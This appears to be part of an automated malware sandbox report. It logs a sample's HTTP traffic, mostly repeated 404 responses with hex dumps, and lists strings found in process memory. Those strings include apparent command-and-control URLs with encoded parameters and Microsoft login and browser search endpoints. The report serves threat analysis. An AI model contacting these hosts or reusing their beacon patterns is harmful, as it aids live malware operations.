            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:17 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=533f06efaad74dc03aa6e60a6ce0ee3f%7C%7C1720198457%7C%7C1720194857%7C%7Ce58761108355481112a576e70ea7b708; expires=Fri, 02-Aug-2024 16:54:17 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=72q7vrf1ctov17qs3optb9pvr5; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=70ed71b81025c39171072e3b0ce9172f%7C%7C1720198460%7C%7C1720194860%7C%7C9ca75b6a083e51ae3fd835288ebd32b3; expires=Fri, 02-Aug-2024 16:54:20 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=63p917bqijodufemh90e3p5q8d; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=756559287fe03a4415a77fd29eb7083c%7C%7C1720198462%7C%7C1720194862%7C%7C3fd2ead987855aa39d85578e2a4e75dd; expires=Fri, 02-Aug-2024 16:54:22 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=srdaoiq9gdvc81bcuceegectf2; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
            Source: sc.exe, 0000000D.00000002.3946994371.0000000004278000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000003AA8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bqtt8ppp.com:301
            Source: sc.exe, 0000000D.00000002.3946994371.0000000004BE4000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000004414000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14
            Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayviewcribbage.com
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayviewcribbage.com/odz6/
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sc.exe, 0000000D.00000003.2503494724.0000000007EDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sc.exe, 0000000D.00000002.3946994371.000000000509A000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.00000000048CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr
            Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/
            Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.united-domains.de/email_website/homepage-baukasten/
